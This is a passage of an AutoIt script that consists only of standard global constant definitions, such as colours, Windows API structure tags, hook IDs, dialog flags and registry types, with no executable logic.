  699. Global Const $color_white = 16777215
  700. Global Const $color_yellow = 16776960
  701. Global Const $clr_none = -1
  702. Global Const $clr_default = -16777216
  703. Global Const $clr_aqua = 16776960
  704. Global Const $clr_black = 0
  705. Global Const $clr_blue = 16711680
  706. Global Const $clr_cream = 15793151
  707. Global Const $clr_fuchsia = 16711935
  708. Global Const $clr_gray = 8421504
  709. Global Const $clr_green = 32768
  710. Global Const $clr_lime = 65280
  711. Global Const $clr_maroon = 6429835
  712. Global Const $clr_medblue = 12845568
  713. Global Const $clr_medgray = 10789024
  714. Global Const $clr_moneygreen = 12639424
  715. Global Const $clr_navy = 8388608
  716. Global Const $clr_olive = 32896
  717. Global Const $clr_purple = 8388736
  718. Global Const $clr_red = 255
  719. Global Const $clr_silver = 12632256
  720. Global Const $clr_skyblue = 15780518
  721. Global Const $clr_teal = 8421376
  722. Global Const $clr_white = 16777215
  723. Global Const $clr_yellow = 65535
  724. Global Const $cc_anycolor = 256
  725. Global Const $cc_fullopen = 2
  726. Global Const $cc_rgbinit = 1
  727. Global Const $ilc_mask = 1
  728. Global Const $ilc_color = 0
  729. Global Const $ilc_colorddb = 254
  730. Global Const $ilc_color4 = 4
  731. Global Const $ilc_color8 = 8
  732. Global Const $ilc_color16 = 16
  733. Global Const $ilc_color24 = 24
  734. Global Const $ilc_color32 = 32
  735. Global Const $ilc_palette = 2048
  736. Global Const $ilc_mirror = 8192
  737. Global Const $ilc_peritemmirror = 32768
  738. Global Const $ilcf_move = 0
  739. Global Const $ilcf_swap = 1
  740. Global Const $ild_normal = 0
  741. Global Const $ild_transparent = 1
  742. Global Const $ild_blend25 = 2
  743. Global Const $ild_blend50 = 4
  744. Global Const $ild_mask = 16
  745. Global Const $ild_image = 32
  746. Global Const $ild_rop = 64
  747. Global Const $ild_overlaymask = 3840
  748. Global Const $ils_normal = 0
  749. Global Const $ils_glow = 1
  750. Global Const $ils_shadow = 2
  751. Global Const $ils_saturate = 4
  752. Global Const $ils_alpha = 8
  753. Global Const $tagpoint = "struct;long X;long Y;endstruct"
  754. Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
  755. Global Const $tagsize = "struct;long X;long Y;endstruct"
  756. Global Const $tagmargins = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight"
  757. Global Const $tagfiletime = "struct;dword Lo;dword Hi;endstruct"
  758. Global Const $tagsystemtime = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct"
  759. Global Const $tagtime_zone_information = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct"
  760. Global Const $tagnmhdr = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct"
  761. Global Const $tagcomboboxexitem = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param"
  762. Global Const $tagnmcbedragbegin = $tagnmhdr & ";int ItemID;wchar szText[260]"
  763. Global Const $tagnmcbeendedit = $tagnmhdr & ";bool fChanged;int NewSelection;wchar szText[260];int Why"
  764. Global Const $tagnmcomboboxex = $tagnmhdr & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param"
  765. Global Const $tagdtprange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid"
  766. Global Const $tagnmdatetimechange = $tagnmhdr & ";dword Flag;" & $tagsystemtime
  767. Global Const $tagnmdatetimeformat = $tagnmhdr & ";ptr Format;" & $tagsystemtime & ";ptr pDisplay;wchar Display[64]"
  768. Global Const $tagnmdatetimeformatquery = $tagnmhdr & ";ptr Format;struct;long SizeX;long SizeY;endstruct"
  769. Global Const $tagnmdatetimekeydown = $tagnmhdr & ";int VirtKey;ptr Format;" & $tagsystemtime
  770. Global Const $tagnmdatetimestring = $tagnmhdr & ";ptr UserString;" & $tagsystemtime & ";dword Flags"
  771. Global Const $tageventlogrecord = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset"
  772. Global Const $taggdip_effectparams_blur = "float Radius; bool ExpandEdge"
  773. Global Const $taggdip_effectparams_brightnesscontrast = "int BrightnessLevel; int ContrastLevel"
  774. Global Const $taggdip_effectparams_colorbalance = "int CyanRed; int MagentaGreen; int YellowBlue"
  775. Global Const $taggdip_effectparams_colorcurve = "int Adjustment; int Channel; int AdjustValue"
  776. Global Const $taggdip_effectparams_colorlut = "byte LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]"
  777. Global Const $taggdip_effectparams_huesaturationlightness = "int HueLevel; int SaturationLevel; int LightnessLevel"
  778. Global Const $taggdip_effectparams_levels = "int Highlight; int Midtone; int Shadow"
  779. Global Const $taggdip_effectparams_redeyecorrection = "uint NumberOfAreas; ptr Areas"
  780. Global Const $taggdip_effectparams_sharpen = "float Radius; float Amount"
  781. Global Const $taggdip_effectparams_tint = "int Hue; int Amount"
  782. Global Const $taggdipbitmapdata = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved"
  783. Global Const $taggdipcolormatrix = "float m[25]"
  784. Global Const $taggdipencoderparam = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct"
  785. Global Const $taggdipencoderparams = "uint Count;" & $taggdipencoderparam
  786. Global Const $taggdiprectf = "struct;float X;float Y;float Width;float Height;endstruct"
  787. Global Const $taggdipstartupinput = "uint Version;ptr Callback;bool NoThread;bool NoCodecs"
  788. Global Const $taggdipstartupoutput = "ptr HookProc;ptr UnhookProc"
  789. Global Const $taggdipimagecodecinfo = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask"
  790. Global Const $taggdippencoderparams = "uint Count;byte Params[1]"
  791. Global Const $taghditem = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State"
  792. Global Const $tagnmhddispinfo = $tagnmhdr & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam"
  793. Global Const $tagnmhdfilterbtnclick = $tagnmhdr & ";int Item;" & $tagrect
  794. Global Const $tagnmheader = $tagnmhdr & ";int Item;int Button;ptr pItem"
  795. Global Const $taggetipaddress = "byte Field4;byte Field3;byte Field2;byte Field1"
  796. Global Const $tagnmipaddress = $tagnmhdr & ";int Field;int Value"
  797. Global Const $taglvfindinfo = "struct;uint Flags;ptr Text;lparam Param;" & $tagpoint & ";uint Direction;endstruct"
  798. Global Const $taglvhittestinfo = $tagpoint & ";uint Flags;int Item;int SubItem;int iGroup"
  799. Global Const $taglvitem = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct"
  800. Global Const $tagnmlistview = $tagnmhdr & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param"
  801. Global Const $tagnmlvcustomdraw = "struct;" & $tagnmhdr & ";dword dwDrawStage;handle hdc;" & $tagrect & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign"
  802. Global Const $tagnmlvdispinfo = $tagnmhdr & ";" & $taglvitem
  803. Global Const $tagnmlvfinditem = $tagnmhdr & ";int Start;" & $taglvfindinfo
  804. Global Const $tagnmlvgetinfotip = $tagnmhdr & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam"
  805. Global Const $tagnmitemactivate = $tagnmhdr & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $tagpoint & ";lparam lParam;uint KeyFlags"
  806. Global Const $tagnmlvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
  807. Global Const $tagnmlvscroll = $tagnmhdr & ";int DX;int DY"
  808. Global Const $tagmchittestinfo = "uint Size;" & $tagpoint & ";uint Hit;" & $tagsystemtime & ";" & $tagrect & ";int iOffset;int iRow;int iCol"
  809. Global Const $tagmcmonthrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span"
  810. Global Const $tagmcrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet"
  811. Global Const $tagmcselrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds"
  812. Global Const $tagnmdaystate = $tagnmhdr & ";" & $tagsystemtime & ";int DayState;ptr pDayState"
  813. Global Const $tagnmselchange = $tagnmhdr & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct"
  814. Global Const $tagnmobjectnotify = $tagnmhdr & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags"
  815. Global Const $tagnmtckeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
  816. Global Const $tagtvitem = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct"
  817. Global Const $tagtvitemex = "struct;" & $tagtvitem & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct"
  818. Global Const $tagnmtreeview = $tagnmhdr & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct"
  819. Global Const $tagnmtvcustomdraw = "struct;" & $tagnmhdr & ";dword DrawStage;handle HDC;" & $tagrect & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level"
  820. Global Const $tagnmtvdispinfo = $tagnmhdr & ";" & $tagtvitem
  821. Global Const $tagnmtvgetinfotip = $tagnmhdr & ";ptr Text;int TextMax;handle hItem;lparam lParam"
  822. Global Const $tagnmtvitemchange = $tagnmhdr & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;"
  823. Global Const $tagtvhittestinfo = $tagpoint & ";uint Flags;handle Item"
  824. Global Const $tagnmtvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
  825. Global Const $tagnmmouse = $tagnmhdr & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $tagpoint & ";lparam HitInfo"
  826. Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
  827. Global Const $tagimageinfo = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $tagrect
  828. Global Const $tagmenuinfo = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData"
  829. Global Const $tagmenuiteminfo = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem"
  830. Global Const $tagrebarbandinfo = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVersion = "WIN_XP") ? "" : ";" & $tagrect & ";uint uChevronState")
  831. Global Const $tagnmrebarautobreak = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak"
  832. Global Const $tagnmrbautosize = $tagnmhdr & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct"
  833. Global Const $tagnmrebar = $tagnmhdr & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam"
  834. Global Const $tagnmrebarchevron = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;" & $tagrect & ";lparam lParamNM"
  835. Global Const $tagnmrebarchildsize = $tagnmhdr & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct"
  836. Global Const $tagcolorscheme = "dword Size;dword BtnHighlight;dword BtnShadow"
  837. Global Const $tagnmtoolbar = $tagnmhdr & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $tagrect
  838. Global Const $tagnmtbhotitem = $tagnmhdr & ";int idOld;int idNew;dword dwFlags"
  839. Global Const $tagtbbutton = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String"
  840. Global Const $tagtbbuttoninfo = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax"
  841. Global Const $tagnetresource = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider"
  842. Global Const $tagoverlapped = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent"
  843. Global Const $tagopenfilename = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx"
  844. Global Const $tagbitmapinfoheader = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct"
  845. Global Const $tagbitmapinfo = $tagbitmapinfoheader & ";dword biRGBQuad[1]"
  846. Global Const $tagblendfunction = "byte Op;byte Flags;byte Alpha;byte Format"
  847. Global Const $tagguid = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct"
  848. Global Const $tagwindowplacement = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]"
  849. Global Const $tagwindowpos = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags"
  850. Global Const $tagscrollinfo = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos"
  851. Global Const $tagscrollbarinfo = "dword cbSize;" & $tagrect & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]"
  852. Global Const $taglogfont = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct"
  853. Global Const $tagkbdllhookstruct = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo"
  854. Global Const $tagprocess_information = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID"
  855. Global Const $tagstartupinfo = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError"
  856. Global Const $tagsecurity_attributes = "dword Length;ptr Descriptor;bool InheritHandle"
  857. Global Const $tagwin32_find_data = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]"
  858. Global Const $tagtextmetric = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet"
  859. Global Const $hgdi_error = Ptr(-1)
  860. Global Const $invalid_handle_value = Ptr(-1)
  861. Global Const $clr_invalid = -1
  862. Global Const $mb_precomposed = 1
  863. Global Const $mb_composite = 2
  864. Global Const $mb_useglyphchars = 4
  865. Global Const $ulw_alpha = 2
  866. Global Const $ulw_colorkey = 1
  867. Global Const $ulw_opaque = 4
  868. Global Const $ulw_ex_noresize = 8
  869. Global Const $wh_callwndproc = 4
  870. Global Const $wh_callwndprocret = 12
  871. Global Const $wh_cbt = 5
  872. Global Const $wh_debug = 9
  873. Global Const $wh_foregroundidle = 11
  874. Global Const $wh_getmessage = 3
  875. Global Const $wh_journalplayback = 1
  876. Global Const $wh_journalrecord = 0
  877. Global Const $wh_keyboard = 2
  878. Global Const $wh_keyboard_ll = 13
  879. Global Const $wh_mouse = 7
  880. Global Const $wh_mouse_ll = 14
  881. Global Const $wh_msgfilter = -1
  882. Global Const $wh_shell = 10
  883. Global Const $wh_sysmsgfilter = 6
  884. Global Const $wpf_asyncwindowplacement = 4
  885. Global Const $wpf_restoretomaximized = 2
  886. Global Const $wpf_setminposition = 1
  887. Global Const $kf_extended = 256
  888. Global Const $kf_altdown = 8192
  889. Global Const $kf_up = 32768
  890. Global Const $llkhf_extended = BitShift($kf_extended, 8)
  891. Global Const $llkhf_injected = 16
  892. Global Const $llkhf_altdown = BitShift($kf_altdown, 8)
  893. Global Const $llkhf_up = BitShift($kf_up, 8)
  894. Global Const $ofn_allowmultiselect = 512
  895. Global Const $ofn_createprompt = 8192
  896. Global Const $ofn_dontaddtorecent = 33554432
  897. Global Const $ofn_enablehook = 32
  898. Global Const $ofn_enableincludenotify = 4194304
  899. Global Const $ofn_enablesizing = 8388608
  900. Global Const $ofn_enabletemplate = 64
  901. Global Const $ofn_enabletemplatehandle = 128
  902. Global Const $ofn_explorer = 524288
  903. Global Const $ofn_extensiondifferent = 1024
  904. Global Const $ofn_filemustexist = 4096
  905. Global Const $ofn_forceshowhidden = 268435456
  906. Global Const $ofn_hidereadonly = 4
  907. Global Const $ofn_longnames = 2097152
  908. Global Const $ofn_nochangedir = 8
  909. Global Const $ofn_nodereferencelinks = 1048576
  910. Global Const $ofn_nolongnames = 262144
  911. Global Const $ofn_nonetworkbutton = 131072
  912. Global Const $ofn_noreadonlyreturn = 32768
  913. Global Const $ofn_notestfilecreate = 65536
  914. Global Const $ofn_novalidate = 256
  915. Global Const $ofn_overwriteprompt = 2
  916. Global Const $ofn_pathmustexist = 2048
  917. Global Const $ofn_readonly = 1
  918. Global Const $ofn_shareaware = 16384
  919. Global Const $ofn_showhelp = 16
  920. Global Const $ofn_ex_noplacesbar = 1
  921. Global Const $std_cut = 0
  922. Global Const $std_copy = 1
  923. Global Const $std_paste = 2
  924. Global Const $std_undo = 3
  925. Global Const $std_redow = 4
  926. Global Const $std_delete = 5
  927. Global Const $std_filenew = 6
  928. Global Const $std_fileopen = 7
  929. Global Const $std_filesave = 8
  930. Global Const $std_printpre = 9
  931. Global Const $std_properties = 10
  932. Global Const $std_help = 11
  933. Global Const $std_find = 12
  934. Global Const $std_replace = 13
  935. Global Const $std_print = 14
  936. Global Const $kb_sendspecial = 0
  937. Global Const $kb_sendraw = 1
  938. Global Const $kb_capsoff = 0
  939. Global Const $kb_capson = 1
  940. Global Const $s_ok = 0
  941. Global Const $e_abort = -2147467260
  942. Global Const $e_accessdenied = -2147024891
  943. Global Const $e_fail = -2147467259
  944. Global Const $e_handle = -2147024890
  945. Global Const $e_invalidarg = -2147024809
  946. Global Const $e_nointerface = -2147467262
  947. Global Const $e_notimpl = -2147467263
  948. Global Const $e_outofmemory = -2147024882
  949. Global Const $e_pointer = -2147467261
  950. Global Const $e_unexpected = -2147418113
  951. Global Const $str_nocasesense = 0
  952. Global Const $str_casesense = 1
  953. Global Const $str_nocasesensebasic = 2
  954. Global Const $str_stripleading = 1
  955. Global Const $str_striptrailing = 2
  956. Global Const $str_stripspaces = 4
  957. Global Const $str_stripall = 8
  958. Global Const $str_chrsplit = 0
  959. Global Const $str_entiresplit = 1
  960. Global Const $str_nocount = 2
  961. Global Const $str_regexpmatch = 0
  962. Global Const $str_regexparraymatch = 1
  963. Global Const $str_regexparrayfullmatch = 2
  964. Global Const $str_regexparrayglobalmatch = 3
  965. Global Const $str_regexparrayglobalfullmatch = 4
  966. Global Const $str_endisstart = 0
  967. Global Const $str_endnotstart = 1
  968. Global Const $sb_ansi = 1
  969. Global Const $sb_utf16le = 2
  970. Global Const $sb_utf16be = 3
  971. Global Const $sb_utf8 = 4
  972. Global Const $se_utf16 = 0
  973. Global Const $se_ansi = 1
  974. Global Const $se_utf8 = 2
  975. Global Const $str_utf16 = 0
  976. Global Const $str_ucs2 = 1
  977. Global Const $opt_coordsrelative = 0
  978. Global Const $opt_coordsabsolute = 1
  979. Global Const $opt_coordsclient = 2
  980. Global Const $opt_errorsilent = 0
  981. Global Const $opt_errorfatal = 1
  982. Global Const $opt_capsnostore = 0
  983. Global Const $opt_capsstore = 1
  984. Global Const $opt_matchstart = 1
  985. Global Const $opt_matchany = 2
  986. Global Const $opt_matchexact = 3
  987. Global Const $opt_matchadvanced = 4
  988. Global Const $ccs_top = 1
  989. Global Const $ccs_nomovey = 2
  990. Global Const $ccs_bottom = 3
  991. Global Const $ccs_noresize = 4
  992. Global Const $ccs_noparentalign = 8
  993. Global Const $ccs_nohilite = 16
  994. Global Const $ccs_adjustable = 32
  995. Global Const $ccs_nodivider = 64
  996. Global Const $ccs_vert = 128
  997. Global Const $ccs_left = 129
  998. Global Const $ccs_nomovex = 130
  999. Global Const $ccs_right = 131
  1000. Global Const $dt_drivetype = 1
  1001. Global Const $dt_ssdstatus = 2
  1002. Global Const $dt_bustype = 3
  1003. Global Const $proxy_ie = 0
  1004. Global Const $proxy_none = 1
  1005. Global Const $proxy_specified = 2
  1006. Global Const $objid_window = 0
  1007. Global Const $objid_titlebar = -2
  1008. Global Const $objid_sizegrip = -7
  1009. Global Const $objid_caret = -8
  1010. Global Const $objid_cursor = -9
  1011. Global Const $objid_alert = -10
  1012. Global Const $objid_sound = -11
  1013. Global Const $dlg_centerontop = 0
  1014. Global Const $dlg_notitle = 1
  1015. Global Const $dlg_notontop = 2
  1016. Global Const $dlg_textleft = 4
  1017. Global Const $dlg_textright = 8
  1018. Global Const $dlg_moveable = 16
  1019. Global Const $dlg_textvcenter = 32
  1020. Global Const $idc_unknown = 0
  1021. Global Const $idc_appstarting = 1
  1022. Global Const $idc_arrow = 2
  1023. Global Const $idc_cross = 3
  1024. Global Const $idc_hand = 32649
  1025. Global Const $idc_help = 4
  1026. Global Const $idc_ibeam = 5
  1027. Global Const $idc_icon = 6
  1028. Global Const $idc_no = 7
  1029. Global Const $idc_size = 8
  1030. Global Const $idc_sizeall = 9
  1031. Global Const $idc_sizenesw = 10
  1032. Global Const $idc_sizens = 11
  1033. Global Const $idc_sizenwse = 12
  1034. Global Const $idc_sizewe = 13
  1035. Global Const $idc_uparrow = 14
  1036. Global Const $idc_wait = 15
  1037. Global Const $idi_application = 32512
  1038. Global Const $idi_asterisk = 32516
  1039. Global Const $idi_exclamation = 32515
  1040. Global Const $idi_hand = 32513
  1041. Global Const $idi_question = 32514
  1042. Global Const $idi_winlogo = 32517
  1043. Global Const $idi_shield = 32518
  1044. Global Const $idi_error = $idi_hand
  1045. Global Const $idi_information = $idi_asterisk
  1046. Global Const $idi_warning = $idi_exclamation
  1047. Global Const $sd_logoff = 0
  1048. Global Const $sd_shutdown = 1
  1049. Global Const $sd_reboot = 2
  1050. Global Const $sd_force = 4
  1051. Global Const $sd_powerdown = 8
  1052. Global Const $sd_forcehung = 16
  1053. Global Const $sd_standby = 32
  1054. Global Const $sd_hibernate = 64
  1055. Global Const $stdin_child = 1
  1056. Global Const $stdout_child = 2
  1057. Global Const $stderr_child = 4
  1058. Global Const $stderr_merged = 8
  1059. Global Const $stdio_inherit_parent = 16
  1060. Global Const $run_create_new_console = 65536
  1061. Global Const $ubound_dimensions = 0
  1062. Global Const $ubound_rows = 1
  1063. Global Const $ubound_columns = 2
  1064. Global Const $mouseeventf_absolute = 32768
  1065. Global Const $mouseeventf_move = 1
  1066. Global Const $mouseeventf_leftdown = 2
  1067. Global Const $mouseeventf_leftup = 4
  1068. Global Const $mouseeventf_rightdown = 8
  1069. Global Const $mouseeventf_rightup = 16
  1070. Global Const $mouseeventf_middledown = 32
  1071. Global Const $mouseeventf_middleup = 64
  1072. Global Const $mouseeventf_wheel = 2048
  1073. Global Const $mouseeventf_xdown = 128
  1074. Global Const $mouseeventf_xup = 256
  1075. Global Const $reg_none = 0
  1076. Global Const $reg_sz = 1
  1077. Global Const $reg_expand_sz = 2
  1078. Global Const $reg_binary = 3
  1079. Global Const $reg_dword = 4
  1080. Global Const $reg_dword_little_endian = 4
  1081. Global Const $reg_dword_big_endian = 5
  1082. Global Const $reg_link = 6
  1083. Global Const $reg_multi_sz = 7
  1084. Global Const $reg_resource_list = 8
  1085. Global Const $reg_full_resource_descriptor = 9
  1086. Global Const $reg_resource_requirements_list = 10
  1087. Global Const $reg_qword = 11
  1088. Global Const $reg_qword_little_endian = 11
  1089. Global Const $hwnd_bottom = 1
  1090. Global Const $hwnd_notopmost = -2
  1091. Global Const $hwnd_top = 0
  1092. Global Const $hwnd_topmost = -1
  1093. Global Const $swp_nosize = 1
  1094. Global Const $swp_nomove = 2
  1095. Global Const $swp_nozorder = 4
  1096. Global Const $swp_noredraw = 8
  1097. Global Const $swp_noactivate = 16
  1098. Global Const $swp_framechanged = 32
  1099. Global Const $swp_drawframe = 32
  1100. Global Const $swp_showwindow = 64
  1101. Global Const $swp_hidewindow = 128
  1102. Global Const $swp_nocopybits = 256
  1103. Global Const $swp_noownerzorder = 512
  1104. Global Const $swp_noreposition = 512
  1105. Global Const $swp_nosendchanging = 1024
  1106. Global Const $swp_defererase = 8192
  1107. Global Const $swp_asyncwindowpos = 16384
  1108. Global Const $keyword_default = 1
  1109. Global Const $keyword_null = 2
  1110. Global Const $declared_local = -1
  1111. Global Const $declared_unknown = 0
  1112. Global Const $declared_global = 1
  1113. Global Const $assign_create = 0
  1114. Global Const $assign_forcelocal = 1
  1115. Global Const $assign_forceglobal = 2
  1116. Global Const $assign_existfail = 4
  1117. Global Const $bi_enable = 0
  1118. Global Const $bi_disable = 1
  1119. Global Const $break_enable = 1
  1120. Global Const $break_disable = 0
  1121. Global Const $cdtray_open = "open"
  1122. Global Const $cdtray_closed = "closed"
  1123. Global Const $send_default = 0
  1124. Global Const $send_raw = 1
  1125. Global Const $dir_default = 0
  1126. Global Const $dir_extended = 1
  1127. Global Const $dir_norecurse = 2
  1128. Global Const $dir_remove = 1
  1129. Global Const $dt_all = "ALL"
  1130. Global Const $dt_cdrom = "CDROM"
  1131. Global Const $dt_removable = "REMOVABLE"
  1132. Global Const $dt_fixed = "FIXED"
  1133. Global Const $dt_network = "NETWORK"
  1134. Global Const $dt_ramdisk = "RAMDISK"
  1135. Global Const $dt_unknown = "UNKNOWN"
  1136. Global Const $dt_undefined = 1
  1137. Global Const $dt_fat = "FAT"
  1138. Global Const $dt_fat32 = "FAT32"
  1139. Global Const $dt_exfat = "exFAT"
  1140. Global Const $dt_ntfs = "NTFS"
  1141. Global Const $dt_nwfs = "NWFS"
  1142. Global Const $dt_cdfs = "CDFS"
  1143. Global Const $dt_udf = "UDF"
  1144. Global Const $dma_default = 0
  1145. Global Const $dma_persistent = 1
  1146. Global Const $dma_authentication = 8
  1147. Global Const $ds_unknown = "UNKNOWN"
  1148. Global Const $ds_ready = "READY"
  1149. Global Const $ds_notready = "NOTREADY"
  1150. Global Const $ds_invalid = "INVALID"
  1151. Global Const $mouse_click_left = "left"
  1152. Global Const $mouse_click_right = "right"
  1153. Global Const $mouse_click_middle = "middle"
